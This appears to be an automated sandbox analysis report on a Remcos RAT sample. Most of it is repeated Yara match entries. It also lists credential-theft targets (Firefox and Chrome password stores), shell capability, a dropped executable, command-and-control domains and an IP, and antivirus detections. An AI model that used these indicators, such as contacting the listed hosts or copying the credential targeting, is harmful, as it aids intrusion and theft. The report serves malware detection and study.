Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: \key3.db		17_2_0040A1C4

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

17_2_0040A0A6

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: cmd.exe

17_2_00405671

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.98.107	nikahuve.ac.ug	Netherlands		208476	DANILENKODE	true

Contacted Domains

Name	IP	Active
nikahuve.ac.ug	194.5.98.107	true
tuekisaa.ac.ug	unknown	unknown
parthaha.ac.ug	unknown	unknown
kalskala.ac.ug	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
nikahuve.ac.ug	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Avira: detection malicious, Label: TR/Dropper.MSIL.Gen

Multi AV Scanner detection for submitted file

Source: kyFBQxVbsg.exe	Virustotal: Detection: 46%			Perma Link
Source: kyFBQxVbsg.exe	ReversingLabs: Detection: 57%

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

Antivirus / Scanner detection for submitted sample

Source: kyFBQxVbsg.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: kyFBQxVbsg.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 26.2.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.1.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.7.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.8.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 0.2.kyFBQxVbsg.exe.2e0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.5.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.3.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.4.unpack	Avira: Label: BDS/Backdoor.Gen
